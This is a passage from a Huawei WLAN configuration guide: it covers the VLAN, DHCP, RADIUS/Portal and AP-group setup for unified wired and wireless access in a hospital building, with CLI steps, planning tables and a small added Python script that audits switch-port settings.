e019-1dc7-1e08 0 area_1 1/1 5G 11n 46/59 -68 101 10.23.101.254
---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the Router


#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 102
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.23.102.1
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#


interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
vap-profile wlan-vap wlan 1
radio 1
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
#
return

16.4 Example for Configuring Unified Access for Wired and Wireless Users

Overview of Unified Access for Wired and Wireless Users


In real-world situations, both wired and wireless users need to access one network. For
example, the PCs and printers of a company connect to the network in wired mode, and
laptops and mobile phones wirelessly connect to the network. After the unified access for
wired and wireless users is configured on a network, the network allows access of both wired
and wireless users, and manages all the users in a unified manner.

Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an
appropriate security policy according to service requirements.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same.
If you set the forwarding mode to direct forwarding, you are also advised not to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, a large number of broadcast packets
will be transmitted in the VLANs, and WLAN users on different APs will be able to
communicate directly at Layer 2.


l Configure the management VLAN and service VLAN:


– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-5 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
  V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
    AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
    AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
    AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D,
    AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
  V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
    AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
    AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
    AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12,
    R230D, R240D
  V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
    AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
    AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
    AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
A hospital needs to deploy a wired and a wireless network in the hospital building to meet
service requirements. To make management and maintenance easy, the administrator requires
that wired and wireless users be centrally managed on the AC, non-authentication and Portal
authentication be configured for the wired and wireless users respectively, and wireless users
roam under the same AC.
As shown in Figure 16-3, the AC connects to the egress gateway Router in the uplink
direction. In the downlink direction, the AC connects to and manages APs through S5700-1
and S5700-2 access switches. The S5700-1 and S5700-2 are deployed in the first and second
floors respectively. In each room, the AP2010DN is deployed to provide both wired and
wireless access. The AP5030DN is deployed in the corridor to provide wireless network
coverage. The S5700-1 and S5700-2 are PoE switches and directly provide power to
connected APs.

To facilitate network planning and management, the access switches are only used to
transparently transmit data at Layer 2, and all gateways are configured on the AC.

The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs.

Figure 16-3 Networking diagram for configuring unified access for wired and wireless users

[Figure: Internet - Router - AC. The AC connects to the Router through GE1/0/4, to the Agile
Controller through GE1/0/3, to the S5700-1 through GE1/0/1, and to the S5700-2 through
GE1/0/2. The S5700-1 and S5700-2 connect to the AC through GE0/0/1 and to AP101-AP103 and
AP201-AP203 respectively through GE0/0/2, GE0/0/3, and GE0/0/4.]

Data Planning

Table 16-6 Network data planning

Item              Interface  VLAN      Description
AC                GE1/0/1    100, 201  Connected to the S5700-1
                  GE1/0/2    100, 202  Connected to the S5700-2
                  GE1/0/3    200       Connected to the Agile Controller
                  GE1/0/4    300       Connected to the egress gateway
S5700-1           GE0/0/1    100, 201  Connected to the AC
                  GE0/0/2    100, 201  Connected to AP101
                  GE0/0/3    100, 201  Connected to AP102
                  GE0/0/4    100, 201  Connected to AP103
S5700-2           GE0/0/1    100, 202  Connected to the AC
                  GE0/0/2    100, 202  Connected to AP201
                  GE0/0/3    100, 202  Connected to AP202
                  GE0/0/4    100, 202  Connected to AP203
AP101 and AP102   Eth0/0/0   201       GE0/0/0 connects to the S5700-1. Eth0/0/0 and Eth0/0/1
                  Eth0/0/1             connect to wired users. AP101 and AP102 are AP2010DNs
                  GE0/0/0              deployed in rooms on the first floor to provide wired
                                       and wireless access.
AP103             -          -         AP103 is an AP5030DN deployed in the corridor on the
                                       first floor to provide wireless access.
AP201 and AP202   Eth0/0/0   202       GE0/0/0 connects to the S5700-2. Eth0/0/0 and Eth0/0/1
                  Eth0/0/1             connect to wired users. AP201 and AP202 are AP2010DNs
                  GE0/0/0              deployed in rooms on the second floor to provide wired
                                       and wireless access.
AP203             -          -         AP203 is an AP5030DN deployed in the corridor on the
                                       second floor to provide wireless access.

Table 16-7 Service data planning


Item: IP address of the AC's source interface
  10.23.100.1/24

Item: AP group
  l Name: ap-group1
  l Referenced profiles: VAP profile wlan-vap1, regulatory domain profile domain1, and radio
    profiles radio-2g and radio-5g
  l Name: ap-group2
  l Referenced profiles: VAP profile wlan-vap2, regulatory domain profile domain1, and radio
    profiles radio-2g and radio-5g

Item: Portal access profile
  l Name: portal1
  l Referenced profile: Portal server template portal1

Item: Authentication profile
  l Name: portal1
  l Referenced profile: Portal access profile portal1

Item: Regulatory domain profile
  l Name: domain1
  l Country code: CN

Item: AP wired port profile
  Name: wired1, wired2, wired3, or wired4

Item: RRM profile
  Name: rrm1

Item: Radio profile
  l Name: radio-2g or radio-5g
  l Referenced profile: RRM profile rrm1

Item: Security profile
  l Name: wlan-security
  l Security and authentication policy: OPEN

Item: SSID profile
  l Name: wlan-ssid
  l SSID: hospital-wlan

Item: Traffic profile
  Name: traffic1

Item: VAP profile
  l Name: wlan-vap1
  l SSID: hospital-wlan
  l Data forwarding mode: tunnel forwarding
  l Service VLAN: VLAN 101
  l Referenced profiles: security profile wlan-security, SSID profile wlan-ssid, authentication
    profile portal1, and traffic profile traffic1
  Description: Provides WLAN network coverage for the first floor of the building.

  l Name: wlan-vap2
  l SSID: hospital-wlan
  l Data forwarding mode: tunnel forwarding
  l Service VLAN: VLAN 102
  l Referenced profiles: security profile wlan-security, SSID profile wlan-ssid, authentication
    profile portal1, and traffic profile traffic1
  Description: Provides WLAN network coverage for the second floor of the building.

Item: DHCP server
  The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs.

Item: AP gateway and IP address pool range
  VLANIF100: 10.23.100.1/24, 10.23.100.2-10.23.100.254/24

Item: Gateway and IP address pool range of the wireless users
  VLANIF101: 10.23.101.1/24, 10.23.101.2-10.23.101.254/24
  VLANIF102: 10.23.102.1/24, 10.23.102.2-10.23.102.254/24

Item: Gateway and IP address pool range of the wired users
  VLANIF201: 10.23.201.1/24, 10.23.201.2-10.23.201.254/24
  VLANIF202: 10.23.202.1/24, 10.23.202.2-10.23.202.254/24

Item: Server parameters
  Authentication server:
  l IP address: 10.23.200.1
  l Port number: 1812
  l RADIUS shared key: Admin@123
  Accounting server:
  l IP address: 10.23.200.1
  l Port number: 1813
  l RADIUS shared key: Admin@123
  Authorization server:
  l IP address: 10.23.200.1
  l RADIUS shared key: Admin@123
  Portal server:
  l IP address: 10.23.200.1
  l Port number that the AC uses to listen on Portal protocol packets: 2000
  l Destination port number in the packets that the AC sends to the Portal server: 50100
  l Portal shared key: Admin@123
  l Encryption key for the URL parameters that the AC sends to the Portal server: Admin@123
  Description:
  l The Service Controller (SC) of the Agile Controller provides RADIUS server and Portal
    server functions; therefore, the IP addresses of the authentication server, accounting
    server, authorization server, and Portal server are all the IP address of the SC.
  l Configure a RADIUS accounting server to collect user login and logout information. The
    port numbers of the authentication server and accounting server must be the same as those
    of the RADIUS server.
  l Configure an authorization server to enable the RADIUS server to deliver authorization
    rules to the AC. The shared key of the authorization server must be the same as those of
    the authentication server and accounting server.

Table 16-8 Radio channel data planning


Item    Data
AP101   Radio 0: channel 1 and power level 10
AP102   Radio 0: channel 6 and power level 10
AP103   Radio 0: channel 11 and power level 10
        Radio 1: channel 153 and power level 10
AP201   Radio 0: channel 1 and power level 10
AP202   Radio 0: channel 6 and power level 10
AP203   Radio 0: channel 11 and power level 10
        Radio 1: channel 157 and power level 10

Description (all APs): Use the WLAN Planner to plan AP installation locations, and the working
channel and power of the AP radio. Set the channel mode and power mode to fixed, and configure
the channel and power for each AP.

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure all network devices to enable the APs, S5700-1, S5700-2, and AC to
communicate with upper-layer devices.
2. Configure the AC as a DHCP server to assign IP addresses to APs, wired users, and
wireless users.
3. Configure a RADIUS server template with authentication, accounting, and authorization
servers, and configure Portal authentication.
4. Configure basic WLAN services, including AC system parameters, AP management, and
WLAN service parameters.
5. Configure VAPs and deliver VAP parameters to APs.
6. Verify the configuration to ensure that both wired and wireless users can access the
Internet.

Procedure
Step 1 Configure network devices to communicate with each other.

# Add interfaces GE0/0/1 to GE0/0/4 of the S5700-1 and S5700-2 to VLAN 100
(management VLAN), interfaces GE0/0/1 to GE0/0/4 of the S5700-1 to VLAN 201 (VLAN
for wired service packets), and interfaces GE0/0/1 to GE0/0/4 of the S5700-2 to VLAN 202
(VLAN for wireless service packets). Set PVIDs for interfaces directly connected to APs, and
you are also advised to configure port isolation on these interfaces to reduce broadcast
packets. The S5700-1 is used as an example here. The configuration on the S5700-2 is similar.
For details, see the configuration file of the S5700-2.
[HUAWEI] sysname S5700-1
[S5700-1] vlan batch 100 201
[S5700-1] interface gigabitethernet 0/0/1
[S5700-1-GigabitEthernet0/0/1] port link-type trunk
[S5700-1-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/1] quit
[S5700-1] interface gigabitethernet 0/0/2
[S5700-1-GigabitEthernet0/0/2] port link-type trunk
[S5700-1-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 100 //Set a PVID for the interface directly connected to the AP.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/2] quit
[S5700-1] interface gigabitethernet 0/0/3
[S5700-1-GigabitEthernet0/0/3] port link-type trunk
[S5700-1-GigabitEthernet0/0/3] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/3] port trunk pvid vlan 100
[S5700-1-GigabitEthernet0/0/3] port-isolate enable
[S5700-1-GigabitEthernet0/0/3] quit
[S5700-1] interface gigabitethernet 0/0/4
[S5700-1-GigabitEthernet0/0/4] port link-type trunk
[S5700-1-GigabitEthernet0/0/4] port trunk allow-pass vlan 100 201
[S5700-1-GigabitEthernet0/0/4] port trunk pvid vlan 100
[S5700-1-GigabitEthernet0/0/4] port-isolate enable
[S5700-1-GigabitEthernet0/0/4] quit
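The S5700-1 configuration above applies the rules from Configuration Notes to every AP-facing port: the trunk carries the management VLAN (100) and the wired service VLAN (201), the PVID is the management VLAN so the AP's untagged CAPWAP traffic reaches the AC, and port isolation is enabled. The following Python script is an added illustration, not a Huawei tool or part of this document's procedure; it audits a configuration in display current-configuration style against exactly those rules so a reviewer can catch a port that was left out. The sample configuration embedded in it is constructed (GE0/0/3 lacks port isolation and GE0/0/4 keeps the default PVID); the assumption that port isolation appears in saved configuration as a line beginning with `port-isolate enable` is mine.

```python
"""Audit AP-facing switch ports against the rules of this configuration example.

Added illustration (not Huawei tooling). For each AP-facing interface it checks
that the port is a trunk allowing the management and wired service VLANs, that
the PVID equals the management VLAN, and that port isolation is enabled; it also
checks that the management VLAN and service VLAN differ.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Sequence, Set

# Constructed sample, not a capture from the S5700-1 in the document:
# GE0/0/3 lacks port isolation and GE0/0/4 keeps the default PVID (VLAN 1).
SAMPLE_CONFIG = """\
sysname S5700-1
vlan batch 100 201
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk allow-pass vlan 100 201
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100 201
 port-isolate enable group 1
#
interface GigabitEthernet0/0/3
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100 201
#
interface GigabitEthernet0/0/4
 port link-type trunk
 port trunk allow-pass vlan 100 201
 port-isolate enable group 1
#
"""

# Interfaces that face APs in this example (Table 16-6).
AP_PORTS = ["GigabitEthernet0/0/2", "GigabitEthernet0/0/3", "GigabitEthernet0/0/4"]


@dataclass
class Interface:
    name: str
    link_type: Optional[str] = None
    allowed: Set[int] = field(default_factory=set)
    pvid: int = 1  # VRP default PVID when none is configured
    isolated: bool = False


def parse_vlan_list(tokens: Sequence[str]) -> Set[int]:
    """Expand a VRP VLAN list such as '100 201' or '100 to 102 201'."""
    ids: Set[int] = set()
    i = 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            ids.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            ids.add(int(tokens[i]))
            i += 1
    return ids


def parse_interfaces(config: str) -> Dict[str, Interface]:
    """Collect trunk-related settings from every 'interface' stanza."""
    interfaces: Dict[str, Interface] = {}
    current: Optional[Interface] = None
    for raw in config.splitlines():
        if not raw.startswith(" "):  # top-level line ends any open stanza
            match = re.match(r"interface (\S+)$", raw.strip())
            current = Interface(match.group(1)) if match else None
            if current:
                interfaces[current.name] = current
            continue
        if current is None:
            continue
        line = raw.strip()
        if line.startswith("port link-type "):
            current.link_type = line.split()[-1]
        elif line.startswith("port trunk allow-pass vlan "):
            current.allowed |= parse_vlan_list(line.split()[4:])
        elif line.startswith("port trunk pvid vlan "):
            current.pvid = int(line.split()[-1])
        elif line.startswith("port-isolate enable"):  # assumed saved-config form
            current.isolated = True
    return interfaces


def audit_ap_ports(config: str, ap_ports: Sequence[str], mgmt_vlan: int,
                   service_vlan: int) -> Dict[str, List[str]]:
    """Return {interface: [findings]}; an empty dict means the config passes."""
    findings: Dict[str, List[str]] = {}
    if mgmt_vlan == service_vlan:
        findings["global"] = ["management VLAN and service VLAN must differ"]
    interfaces = parse_interfaces(config)
    for name in ap_ports:
        intf = interfaces.get(name)
        if intf is None:
            findings[name] = ["interface not configured"]
            continue
        problems: List[str] = []
        if intf.link_type != "trunk":
            problems.append("link type is not trunk")
        missing = sorted({mgmt_vlan, service_vlan} - intf.allowed)
        if missing:
            problems.append(f"trunk does not allow VLAN(s) {missing}")
        if intf.pvid != mgmt_vlan:
            problems.append(f"PVID is {intf.pvid}, expected management VLAN {mgmt_vlan}")
        if not intf.isolated:
            problems.append("port isolation not enabled")
        if problems:
            findings[name] = problems
    return findings


if __name__ == "__main__":
    for port, problems in audit_ap_ports(SAMPLE_CONFIG, AP_PORTS, 100, 201).items():
        print(f"{port}: {'; '.join(problems)}")
```

Run it against the output of display current-configuration saved from each access switch; for the S5700-2 pass 202 as the service VLAN. A clean run produces no output.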

# On the AC, add GE1/0/1 connected to the S5700-1 to VLAN 100 and VLAN 201, GE1/0/2
connected to the S5700-2 to VLAN 100 and VLAN 202, GE1/0/4 connected to the upper-
layer network to VLAN 300, and GE1/0/3 connected to the Agile Controller to VLAN 200.
[HUAWEI] sysname AC
[AC] vlan batch 100 200 201 202 300
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 201
[AC-GigabitEthernet1/0/1] quit
[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 202
[AC-GigabitEthernet1/0/2] quit
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 200
[AC-GigabitEthernet1/0/3] quit
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 300
[AC-GigabitEthernet1/0/4] quit

# Configure VLANIF 200 for communication between the AC and Agile Controller.
[AC] interface vlanif200
[AC-Vlanif200] ip address 10.23.200.2 24 //Configure an IP address for communication between the AC and Agile Controller.
[AC-Vlanif200] quit

Step 2 Configure the AC as a DHCP server to assign IP addresses to PCs, APs, and STAs.
# Configure the AC to assign IP addresses to PCs, APs, and STAs from an interface address
pool.
[AC] dhcp enable
[AC] vlan batch 101 102
[AC] interface vlanif 100 //Configure an interface address pool to allocate IP addresses to APs.
[AC-Vlanif100] description manage_ap
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface
[AC-Vlanif100] quit
[AC] interface vlanif 101 //Configure an interface address pool to allocate IP addresses to STAs on the first floor.
[AC-Vlanif101] description manage_floor1_sta
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit
[AC] interface vlanif 102 //Configure an interface address pool to allocate IP addresses to STAs on the second floor.
[AC-Vlanif102] description manage_floor2_sta
[AC-Vlanif102] ip address 10.23.102.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit
[AC] interface vlanif 201 //Configure an interface address pool to allocate IP addresses to PCs on the first floor.
[AC-Vlanif201] description manage_floor1_pc
[AC-Vlanif201] ip address 10.23.201.1 24
[AC-Vlanif201] dhcp select interface
[AC-Vlanif201] quit
[AC] interface vlanif 202 //Configure an interface address pool to allocate IP addresses to PCs on the second floor.
[AC-Vlanif202] description manage_floor2_pc
[AC-Vlanif202] ip address 10.23.202.1 24
[AC-Vlanif202] dhcp select interface
[AC-Vlanif202] quit

Step 3 Configure a RADIUS server template with authentication, accounting, and authorization
servers, and configure Portal authentication.

# Configure a RADIUS server template on the AC, and configure authentication, accounting,
and authorization in the template.
[AC] radius-server template radius1 //Create the RADIUS server template radius1.
[AC-radius-radius1] radius-server authentication 10.23.200.1 1812 source ip-address 10.23.200.2 weight 80 //Configure the RADIUS authentication server and authentication port 1812. The AC uses the IP address 10.23.200.2 to communicate with the RADIUS server.
[AC-radius-radius1] radius-server accounting 10.23.200.1 1813 source ip-address 10.23.200.2 weight 80 //Configure the RADIUS accounting server to collect user login and logout information, and set the accounting port number to 1813. The AC uses the IP address 10.23.200.2 to communicate with the RADIUS server.
[AC-radius-radius1] radius-server shared-key cipher Admin@123 //Configure the shared key for the RADIUS server.
[AC-radius-radius1] undo radius-server user-name domain-included //The user name that the device sends to the RADIUS server does not carry the domain name. Configure this command when the RADIUS server does not accept user names that carry the domain name.
[AC-radius-radius1] quit
[AC] radius-server authorization 10.23.200.1 shared-key cipher Admin@123 //Configure an IP address for the RADIUS authorization server and set the shared key to Admin@123, the same as the authentication and accounting keys. Configure the authorization server so that the RADIUS server can deliver authorization rules to the AC.
[AC] aaa
[AC-aaa] authentication-scheme radius1 //Create the authentication scheme radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Agile Controller functions as the RADIUS server, the authentication mode must be set to RADIUS.
[AC-aaa-authen-radius1] quit
[AC-aaa] accounting-scheme radius1 //Create the accounting scheme radius1.
[AC-aaa-accounting-radius1] accounting-mode radius //Set the accounting mode to RADIUS. To facilitate account status maintenance on the RADIUS server, including login, logout, and forced logout information, the accounting mode must be set to RADIUS.
[AC-aaa-accounting-radius1] quit
[AC-aaa] domain portal1 //Create the domain portal1.
[AC-aaa-domain-portal1] authentication-scheme radius1 //Bind the authentication scheme radius1.
[AC-aaa-domain-portal1] accounting-scheme radius1 //Bind the accounting scheme radius1.
[AC-aaa-domain-portal1] radius-server radius1 //Bind the RADIUS server template radius1.
[AC-aaa-domain-portal1] quit
[AC-aaa] quit

# Configure the Portal server.
[AC] web-auth-server portal1 //Create the Portal server template portal1.
[AC-web-auth-server-portal1] server-ip 10.23.200.1 //Configure an IP address for the Portal server.
[AC-web-auth-server-portal1] port 50100 //Set the destination port number used by the device to send packets to the Portal server to 50100 (default setting).
[AC-web-auth-server-portal1] shared-key cipher Admin@123 //Configure the shared key for message exchange between the AC and Portal server.
[AC-web-auth-server-portal1] url http://10.23.200.1:8080/portal //Configure the URL for the Portal server.
[AC-web-auth-server-portal1] quit

# Enable Portal authentication for wireless users, and configure non-authentication for wired
users.
[AC] portal-access-profile name portal1
[AC-portal-acces-profile-portal1] web-auth-server portal1 direct //Bind the Portal server template portal1 and specify Layer 2 authentication as the Portal authentication mode.
[AC-portal-acces-profile-portal1] quit
[AC] authentication-profile name portal1
[AC-authen-profile-portal1] portal-access-profile portal1
[AC-authen-profile-portal1] access-domain portal1 force //Configure the forcible user domain portal1.
[AC-authen-profile-portal1] quit

Step 4 Configure the APs to go online.

# Create the AP groups; the APs are added to them below.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn //Configure the AC country code. Radio features of APs managed by the AC must conform to local laws and regulations. The default country code is CN.
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group2] quit
[AC-wlan-view] quit

# Configure the AC's source interface.
[AC] capwap source interface vlanif 100

# Import the APs offline on the AC.
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 101 ap-mac 60de-4476-e320
[AC-wlan-ap-101] ap-name ap-101
[AC-wlan-ap-101] ap-group ap-group1 //Add APs on the first floor to ap-group1.
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-101] quit
[AC-wlan-view] ap-id 102 ap-mac 60de-4476-e340
[AC-wlan-ap-102] ap-name ap-102
[AC-wlan-ap-102] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-id 103 ap-mac dcd2-fc04-b520
[AC-wlan-ap-103] ap-name ap-103
[AC-wlan-ap-103] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-103] quit
[AC-wlan-view] ap-id 201 ap-mac 60de-4476-e360
[AC-wlan-ap-201] ap-name ap-201
[AC-wlan-ap-201] ap-group ap-group2 //Add APs on the second floor to ap-group2.
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-201] quit
[AC-wlan-view] ap-id 202 ap-mac 60de-4476-e380
[AC-wlan-ap-202] ap-name ap-202
[AC-wlan-ap-202] ap-group ap-group2
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-202] quit
[AC-wlan-view] ap-id 203 ap-mac dcd2-fc04-b540
[AC-wlan-ap-203] ap-name ap-203
[AC-wlan-ap-203] ap-group ap-group2
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-203] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor  : normal          [6]
-------------------------------------------------------------------------------------------------
ID   MAC             Name    Group      IP             Type          State  STA  Uptime
-------------------------------------------------------------------------------------------------
101  60de-4476-e320  ap-101  ap-group1  10.23.101.254  AP6010DN-AGN  nor    0    10S
102  60de-4476-e340  ap-102  ap-group1  10.23.101.253  AP6010DN-AGN  nor    0    15S
103  dcd2-fc04-b520  ap-103  ap-group1  10.23.101.252  AP6010DN-AGN  nor    0    23S
201  60de-4476-e360  ap-201  ap-group2  10.23.102.254  AP6010DN-AGN  nor    0    45S
202  60de-4476-e380  ap-202  ap-group2  10.23.102.253  AP6010DN-AGN  nor    0    49S
203  dcd2-fc04-b540  ap-203  ap-group2  10.23.102.252  AP6010DN-AGN  nor    0    55S
-------------------------------------------------------------------------------------------------
Total: 6

# Configure the AP2010DN's uplink interface GE0/0/0 and downlink interfaces Eth0/0/0 and
Eth0/0/1 to allow wired service packets to pass through.
[AC-wlan-view] wired-port-profile name wired1
[AC-wlan-wired-port-wired1] vlan pvid 201 //The downlink interface of the AP2010DN is used to connect wired terminals, such as PCs. Set a PVID for the interface. VLAN 201 is used to transmit wired service packets of the first floor.
[AC-wlan-wired-port-wired1] vlan untagged 201 //The downlink interface of the AP2010DN is used to connect wired terminals. Add the interface to VLAN 201 in untagged mode.
[AC-wlan-wired-port-wired1] quit
[AC-wlan-view] wired-port-profile name wired2
[AC-wlan-wired-port-wired2] vlan tagged 201 //The uplink interface of the AP2010DN is used to connect to the upper-layer devices. Add the interface to VLAN 201 in tagged mode.
[AC-wlan-wired-port-wired2] quit
[AC-wlan-view] wired-port-profile name wired3
[AC-wlan-wired-port-wired3] vlan pvid 202 //The downlink interface of the AP2010DN is used to connect wired terminals, such as PCs. Set a PVID for the interface. VLAN 202 is used to transmit wired service packets of the second floor.
[AC-wlan-wired-port-wired3] vlan untagged 202
[AC-wlan-wired-port-wired3] quit
[AC-wlan-view] wired-port-profile name wired4
[AC-wlan-wired-port-wired4] vlan tagged 202
[AC-wlan-wired-port-wired4] quit
[AC-wlan-view] ap-id 101
[AC-wlan-ap-101] wired-port-profile wired1 ethernet 0
[AC-wlan-ap-101] wired-port-profile wired1 ethernet 1
